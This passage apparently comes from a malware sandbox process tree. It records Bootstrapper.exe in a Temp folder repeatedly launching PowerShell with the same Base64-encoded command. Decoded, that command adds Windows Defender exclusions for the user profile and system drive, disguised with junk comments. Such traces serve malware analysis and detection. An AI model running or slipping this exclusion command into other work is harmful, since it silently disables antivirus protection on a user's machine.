        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        24⤵
        
        PID:4624
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        24⤵
        
        PID:6252
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        25⤵
        
        PID:6668
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        25⤵
        
        PID:6756
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        26⤵
        
        PID:2404
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        26⤵
        
        PID:5948
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        27⤵
        
        PID:6608
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        27⤵
        
        PID:6860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        28⤵
        
        PID:6756
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        28⤵
        
        PID:6548
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        29⤵
        
        PID:7164
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        29⤵
        
        PID:4484
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        30⤵
        
        PID:7304
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        30⤵
        
        PID:7336
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        31⤵
        
        PID:7620
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        31⤵
        
        PID:7644
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        32⤵
        
        PID:7944
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        32⤵
        
        PID:7964
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        33⤵
        
        PID:6200
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        33⤵
        
        PID:6876
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        34⤵
        
        PID:7604
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        34⤵
        
        PID:7632
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        35⤵
        
        PID:7892
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        35⤵
        
        PID:7664
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        36⤵
        
        PID:3664
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        36⤵
        
        PID:3652
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        37⤵
        
        PID:1172
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        37⤵
        
        PID:8048
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        38⤵
        
        PID:8244
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        38⤵
        
        PID:8508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        39⤵
        
        PID:9008
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        39⤵
        
        PID:9040
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        40⤵
        
        PID:3604
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        40⤵
        
        PID:1360
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        41⤵
        
        PID:8524
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        41⤵
        
        PID:6888
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        42⤵
        
        PID:9024
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        42⤵
        
        PID:7216
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        43⤵
        
        PID:1712
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        44⤵
        
        PID:4880
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        43⤵
        
        PID:1372
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        44⤵
        
        PID:8968
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        44⤵
        
        PID:9076
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        45⤵
        
        PID:4316
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        45⤵
        
        PID:2488
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        46⤵
        
        PID:5744
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        46⤵
        
        PID:6640
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        47⤵
        
        PID:6084
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        47⤵
        
        PID:6580
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        48⤵
        
        PID:3684
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        49⤵
        
        PID:1504
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        48⤵
        
        PID:680
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        49⤵
        
        PID:5536
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        49⤵
        
        PID:1464
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        50⤵
        
        PID:3088
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        50⤵
        
        PID:5232
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        51⤵
        
        PID:5580
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        51⤵
        
        PID:3676
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        52⤵
        
        PID:5356
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        52⤵
        
        PID:9084
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        53⤵
        
        PID:5324
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        53⤵
        
        PID:6740
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        54⤵
        
        PID:5408
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        54⤵
        
        PID:8020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        55⤵
        
        PID:6704
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        55⤵
        
        PID:6252
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
